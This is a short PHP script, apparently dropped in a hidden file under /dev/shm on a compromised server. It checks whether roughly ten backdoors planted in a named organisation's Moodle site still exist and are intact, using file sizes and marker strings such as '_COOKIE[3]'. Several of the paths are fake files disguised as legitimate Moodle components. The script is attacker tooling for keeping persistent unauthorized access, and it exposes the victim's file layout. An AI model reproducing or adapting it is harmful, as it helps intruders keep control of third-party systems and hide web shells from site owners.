File: //dev/shm/.pgrp
<?php $r = '/var/www/html/formacion.bdp.com.py'; $x = ["/mod/chat/classes/analytics/indicator/cognitive.depth.php"=>"bd@@184928@@414",
"/lib/htmlpurifier/HTMLPurifier/Bootstrap.php"=>"bd@@184931@@_COOKIE[3]",
"/blocks/blog_tags/edit_form.php"=>"bd@@184933@@data_storage",
"/admin/tool/capability/index.php"=>"bd@@184934@@If-Modified-Since",
"/lib/requirejs.php"=>"bd@@184936@@reverse_searcher",
"/lib/editor/tinymce/plugins/moodleemoticon/lang/en/tinymce.moodleemoticon.php"=>"bd@@184937@@535",
"/lib/spout/src/Spout/Reader/Common/Creator/Sliding.php"=>"bd@@184938@@535",
"/admin/tool/log/store/legacy/lang/en/logstore.legacy.php"=>"bd@@184939@@414",
"/mod/assign/feedback/editpdf/classes/event/gateways.inc.php"=>"bd@@184940@@634",
"/mod/assignment/type/uploadsingle/classes/privacy/alt_nav.php"=>"bd@@184941@@619"]; foreach ($x as $p => $l) { $f = "{$r}{$p}"; list($t, $id, $pt) = explode('@@', $l); if (!file_exists($f)) { print "<$t>{$id}##d</$t>\n"; continue; } if (is_numeric($pt)) { $fs = filesize($f); if ($fs != $pt) { print "<$t>{$id}##bs</$t>\n"; } } else { $c = file_get_contents($f); if (!strstr($c, $pt)) { print "<$t>{$id}##d</$t>\n"; } } } die('!end!');